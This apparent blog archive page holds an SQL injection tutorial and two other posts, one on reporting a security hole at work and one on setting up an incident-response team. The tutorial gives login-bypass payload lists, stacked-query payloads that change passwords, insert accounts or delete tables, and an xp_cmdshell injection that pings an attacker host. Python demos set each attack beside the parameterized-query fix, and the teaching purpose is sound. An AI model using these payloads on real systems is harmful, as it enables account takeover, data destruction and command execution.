Archive for July, 2007

Structured Query Language (SQL) Injection

July 31st, 2007

A major attack vector web programmers sometimes forget about is input handling. If user input is pasted into a SQL statement without being validated, escaped or, better, bound as a query parameter, an attacker can submit input that changes the structure of the query the server executes. This can make the server return more data than it should, let the attacker modify records, or allow entire tables or databases to be deleted.

SQL injection points occur anywhere user input reaches a query without being handled correctly. The most common points of attack are login pages, search pages and URL query strings, but attacks are not limited to these entry points: cookies, HTTP headers and hidden form fields are user input too. All user input needs to be handled correctly to prevent SQL injection attacks.

SQL Injection Basics

SQL injection is simple in theory: the attacker finds an input that is trusted and passed into a query sent to the SQL server. Once a vulnerable input is found, the goal is to force the query's condition to evaluate to true regardless of what the programmer intended.

The most common way to force a SQL statement to return true is to add ' OR 1=1-- to a vulnerable input.

Code:
' OR 1=1--
Explanation:
' : Closes the string literal that the vulnerable input is inserted into.
OR : A logical operator that attaches a second condition. Even if the first condition fails because of the now-empty string, the whole WHERE clause evaluates to true if the second condition is true.
1=1 : Since 1 will always equal 1, this expression is always true.
-- : Starts a comment, which forces SQL to ignore everything after the -- (dash dash), including the remainder of the original query. In MySQL the -- must be followed by a space, and # also starts a comment, which is why several of the variations below end in #.
Here are a few variations along the same lines as above:

admin'--
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a
hack" or "a"="a
hack" or 1=1 --
hack' or 1=1 --
hack' or 'a'='a
hack') or ('a'='a
hack") or ("a"="a
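The following is an added example, not code from the original post: it builds a throwaway user table with Python's sqlite3 module (the table layout, user names and passwords are constructed for the demo) and runs a login query in the vulnerable string-concatenation style beside the parameterized form, so the payloads above can be tried against both. SQLite honours the -- comment, so the same tautologies apply.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """Build a throwaway in-memory user table (constructed sample data)."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)"
    )
    conn.executemany(
        "INSERT INTO users (username, password) VALUES (?, ?)",
        [("admin", "s3cret"), ("crackable", "letmein")],
    )
    conn.commit()
    return conn


def build_vulnerable_query(username: str, password: str) -> str:
    """The bug: user input is pasted straight into the SQL text."""
    return (
        "SELECT username FROM users WHERE username = '%s' AND password = '%s'"
        % (username, password)
    )


def login_vulnerable(conn: sqlite3.Connection, username: str, password: str) -> list:
    """Return the usernames the injectable login query matches (sorted)."""
    rows = conn.execute(build_vulnerable_query(username, password)).fetchall()
    return sorted(row[0] for row in rows)


def login_safe(conn: sqlite3.Connection, username: str, password: str) -> list:
    """Same query with bound parameters: input can never alter the SQL structure."""
    rows = conn.execute(
        "SELECT username FROM users WHERE username = ? AND password = ?",
        (username, password),
    ).fetchall()
    return sorted(row[0] for row in rows)


if __name__ == "__main__":
    conn = make_db()
    # Tautology plus comment: the trailing -- swallows the password check.
    print(build_vulnerable_query("' OR 1=1--", "x"))
    print(login_vulnerable(conn, "' OR 1=1--", "x"))          # ['admin', 'crackable']
    # Known username plus comment: no password needed at all.
    print(login_vulnerable(conn, "admin'--", "x"))             # ['admin']
    # Quote-balanced tautology that works even where comments are stripped.
    print(login_vulnerable(conn, "' OR 'x'='x", "' OR 'x'='x"))
    # The parameterized version treats the payload as a literal string value.
    print(login_safe(conn, "' OR 1=1--", "x"))                # []
```

Note the precedence trap in the third call: AND binds tighter than OR, so username = '' OR 'x'='x' AND password = '' OR 'x'='x' is true for every row whatever the password column contains, which is why the quote-balanced payloads in the list above need no comment character.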

Update Data in Database

The ability to edit data in the database can allow attackers to change admin passwords. This attack can be done through a URL, a search box, a login page or any other unprotected input. The following code sample shows how a password can be changed if the table name and an account name are known.

Code:
'; UPDATE users SET password = 'hacked' WHERE username = 'crackable'--

The above code closes the original string, ends the original statement with a semicolon, and appends an UPDATE against the users table: SET changes the password field to hacked for the row where username is crackable, and the trailing -- comments out whatever remained of the original query. This only works where the server and the database driver accept more than one statement per call (stacked queries). Microsoft SQL Server does; many MySQL client calls, such as PHP's mysql_query(), execute a single statement and reject the rest.

Insert Data into Database

Inserting data into a database is very similar to updating a table. As with the update, this attack can be done through a URL, a search box, a login page or any other unprotected input. The following example assumes the attacker knows the table name and enough of its structure (column names and the values each requires) to form a valid row.

Code:
'; INSERT INTO users (id, username, password, details) VALUES (1203, 'myaccount', 'mypassword', 'NA')--

The above code inserts a new user into the users table with an id of 1203, a username of myaccount, a password of mypassword and details of NA. Creating a new account is less likely to be noticed than changing the password of an existing account, whose owner will be locked out and may report it. If enough table information can be gathered to insert a new account, that is preferable; if it cannot, the next best option is to change an existing user's password with an UPDATE. In either case, if the application stores password hashes rather than plain text, the injected value must be a hash in the format the application expects.

Deleting Data from a Database

Deleting data from a database is very similar to updating and inserting. As with the update and the insert, this attack can be done through a URL, a search box, a login page or any other unprotected input. The following code sample requires the attacker to know only the table name.

Code:
'; DELETE FROM users--

The above code deletes every row from the users table. An attacker would normally only issue a DELETE like this to be purely destructive, and it is noisy: it will be discovered very quickly when users are unable to log into the website, and the usual recovery is a restore from backup.
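The UPDATE, INSERT and DELETE payloads above all depend on the same thing: the database call must accept a second statement after the semicolon. The following added example (not code from the original post) shows that dependency with Python's sqlite3 module against a constructed users table: the injectable search query is run once through execute(), which accepts a single statement and so rejects the stacked UPDATE, and once through executescript(), which runs every statement in the string the way a server that permits batches (such as MS SQL) would. The parameterized form is included for contrast. Table layout, names and passwords are made up for the demo.

```python
import sqlite3

# Payloads in the shape shown above: close the string, end the statement,
# append a new statement, comment out the rest of the original query.
PAYLOAD_UPDATE = "'; UPDATE users SET password = 'hacked' WHERE username = 'crackable'--"
PAYLOAD_INSERT = (
    "'; INSERT INTO users (id, username, password, details) "
    "VALUES (1203, 'myaccount', 'mypassword', 'NA')--"
)
PAYLOAD_DELETE = "'; DELETE FROM users--"


def make_db() -> sqlite3.Connection:
    """Constructed sample data for the demo; not a real schema."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, "
        "password TEXT, details TEXT)"
    )
    conn.execute("INSERT INTO users VALUES (1, 'crackable', 'letmein', 'NA')")
    conn.commit()
    return conn


def password_of(conn: sqlite3.Connection, username: str):
    """Look up a stored password so the effect of each payload can be checked."""
    row = conn.execute(
        "SELECT password FROM users WHERE username = ?", (username,)
    ).fetchone()
    return row[0] if row else None


def user_count(conn: sqlite3.Connection) -> int:
    return conn.execute("SELECT COUNT(*) FROM users").fetchone()[0]


def build_query(term: str) -> str:
    """Injectable search query: the term is concatenated into the SQL text."""
    return "SELECT username FROM users WHERE details = '%s'" % term


def search_single_statement(conn: sqlite3.Connection, term: str) -> bool:
    """Run the injectable query through a call that accepts ONE statement.

    sqlite3's execute() refuses a second statement in the string, so the
    stacked UPDATE/INSERT/DELETE never runs. Returns True if the call
    succeeded, False if the driver rejected the stacked statement.
    """
    try:
        conn.execute(build_query(term)).fetchall()
        return True
    except (sqlite3.Warning, sqlite3.Error):
        return False


def search_stacked(conn: sqlite3.Connection, term: str) -> None:
    """Same query through a call that runs every statement in the string,
    which is what a server or driver that permits stacked queries does."""
    conn.executescript(build_query(term))


def search_safe(conn: sqlite3.Connection, term: str) -> list:
    """Bound parameter: the payload is just a string value, nothing else runs."""
    rows = conn.execute(
        "SELECT username FROM users WHERE details = ?", (term,)
    ).fetchall()
    return [r[0] for r in rows]


if __name__ == "__main__":
    conn = make_db()
    print(search_single_statement(conn, PAYLOAD_UPDATE))  # False: driver refused
    print(password_of(conn, "crackable"))                  # letmein, unchanged
    search_stacked(conn, PAYLOAD_UPDATE)
    print(password_of(conn, "crackable"))                  # hacked
    search_stacked(conn, PAYLOAD_INSERT)
    print(password_of(conn, "myaccount"))                  # mypassword
    search_stacked(conn, PAYLOAD_DELETE)
    print(user_count(conn))                                # 0
    print(search_safe(make_db(), PAYLOAD_UPDATE))          # []
```

The single-statement refusal is a property of the client library, not a security control: the same application running on a driver that batches statements is fully exploitable, so the fix is the bound parameter, not reliance on the driver.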

Remote Execution with SQL Injection (MS SQL)

SQL injection can be very powerful. This is an example of an injection that leads to remote code execution on the database host. Older default installations of MS SQL Server ran the service as LocalSystem, an account with full control of the local machine, and with the following code the extended stored procedure master..xp_cmdshell can be invoked to run operating-system commands as that account, as if the attacker were on the box. On SQL Server 2005 and later xp_cmdshell is disabled by default and must first be enabled with sp_configure, which requires sysadmin rights; if the application's database login is sysadmin, the injected batch can do that as well.

Code:
'; exec master..xp_cmdshell 'ping 104.12.45.25'--

The semicolon ends the current SQL statement so that a new command can follow (a stacked query). Because the application usually does not display the command's output, execution is confirmed out of band: run a packet sniffer on 104.12.45.25, the attacker-controlled host, and watch for ICMP echo requests. If packets arrive at 104.12.45.25 from the SQL server, the stored procedure executed successfully.

Hacking, Security

Security Hole

July 29th, 2007

The other week I found a major security hole in one of the systems at work. I notified my manager who then notified the correct people. I am waiting to see if this issue gets resolved. So far I have not seen any progress towards closing the hole. Lack of motivation to patch security holes seems to be a major flaw in big business. That is, until the security hole gets exploited, then it is scramble time.

I have done my part now it is up to the powers that be.

General, Security

How to Create a Security Team for $4.95, Plus Tax - Security Catalyst

July 29th, 2007

Fun Article from the Security Catalyst. Full Article Here.

In addition to getting to break things in order to help our customers prevent assorted miscreants from doing so, one of the many hats I wear at QuietMove is the amorphous responsibility of ‘business development.’ In English, that means I identify organizations that could benefit from our services, sometimes travel to visit them, often buy them lunch, and explore ways we can help them. Though my background is technical, it’s something I’ve really grown to enjoy because I find it interesting to learn about different industries and business models and their unique security challenges.

That said, I’m often surprised by some of the organizations I visit – it’s shocking that some of the largest organizations in critical economic sectors don’t have security organizations, don’t have security programs, and don’t even have a single person for whom ‘security’ is part of their job description. In other cases, there’s a single ‘security’ person with no budget, staff, or authority. I’ve been that guy, so if that’s you, I feel your pain. I’d like to share an anecdote with you about a large company I visited last week who is in the former category – no security organization at all. If your organization has no security-focused staff, or if you’re the one guy or gal whose shoulders it all falls on, I’m also going to share a strategy for moving your organization in the right direction.

The Meeting

It was a pretty exciting morning – I was heading to an initial face-to-face meeting with a potential customer, one of the largest mining companies in the world. My initial contact was with a gentleman who managed their server environment. At my urging he also invited their application and network team. The meeting was scheduled to discuss assessment activities – something they haven’t been doing, and didn’t have the expertise or tools to do in-house. I asked him to invite the other managers because it was important to get their buy-in, and also because our customers get the best value when we test all attackable surface areas.

What I heard during the meeting was one of the variations on a common theme - each group ‘owned security’ for their sphere of responsibility, but there were no overarching standards, and minimal to no coordination. These guys were all professionals – the problem was organizational. Their company didn’t see a need for dedicated security resources.

Well OK, almost all professionals. One of them questioned what they had that was worth someone breaking in to steal. The look from his colleagues was as if he said his company possessed nothing of value, which is more or less what he said.

I pointed out a few things – they’re a mining company, so the list of what sites they are considering buying or leasing because their geological analysis said it would be a good spot was definitely worth something to their international competitors. Also valuable are their supplier lists, customer lists, and employee information, not to mention their reputation.

If it’s Everybody’s Job, it’s Nobody’s Job

Those who know me well, know I have a tendency to devolve a conversation into pedantic comparisons to obscure philosophical and/or historical topics. Lucky for you, Dear Readers, I’m too much of a lazy typist to inflict this habit on you – for too long.

The attitude at the mining company I visited was that security was “everyone’s” job. That may be, but without guidance from an accountable party, there is no incentive for anyone to perform something that they aren’t being measured against.

I’d like to paint a comparison to the relative physical security of a shopping mall vs. a public street. Shopping malls have a financial incentive to police their premises. After all, most people wouldn’t visit a mall after being mugged at spork-point in the food court after the first time, forget about the second. As a result, mall owners will set stricter codes of acceptable behavior on their premises than you’d see on a city street. Meanwhile people will litter the ground with cigarette butts, soda cans, and chewing gum in public places with a frequency you’d never see in their own home.

This is an important side effect of the concept of private property – with ownership comes responsibility. We see the same attitude in the workplace – when security is the responsibility of ‘everyone,’ it’s really owned by no one. People are measured on the performance of their primary job responsibility – meeting development deadlines, system uptime, etc. There is no central coordination of standards, no one who ‘owns’ testing controls, no security metrics, and ultimately little to no security.

Create a Security Team for $4.95, Plus Tax

That’s about the going rate for a dozen donuts. Yes, it’s that easy.

Back to the mining company – I realized that they had a long way to go. Since they didn’t have enough management buy-in for security to form a security organization, had no budget, and no ownership of responsibility, I shared a strategy whereby they could create one using the resources they have available now – themselves.

My suggestion was to pick trusted, interested persons as Single Points of Contact (SPOC) from key parts of their organization, schedule a conference room plus a dial-in conference bridge number for those at different locations, and invite them all to an informal monthly brown-bag lunch.

Pick out a news story related to a security incident or breach at another company from the news - a good place to look is the SC Magazine Breach Blog - and email it to everyone ahead of time. The purpose of the monthly lunch is to do some tabletop war gaming. What you’ll want to discuss is, if a similar incident affected your organization, how would you respond? What controls are in place to detect it? Who would be notified? What actions would be taken?

There are three goals for your Computer Incident Response Team (CIRT) meeting:

1. Identify a Single Point of Contact (SPOC) and backup contact for each part of the organization that should be involved in an incident or breach. In addition to identifying a contact and backup from system administration and network teams, don’t forget to pick points of contact from groups like telecom, finance, human resources, public relations, physical plant security, and any other towers you think you can pull in. Make a phone list, including cell phone numbers, and distribute it to all members.


2. Build an ad-hoc team that can respond to incidents, by building rapport and familiarity. This is an important point – a phone tree does not a team make. The team will learn to work together, and learn what roles they can play in incident response.


3. When (not if) an incident affects your organization, you will have already run through similar scenarios in your tabletop wargaming exercises. You’ll have a response team consisting of members of each part of your organization that might be affected. Most importantly, you’ll have the resources to effect a coordinated response.

Don’t forget the donuts. 

Security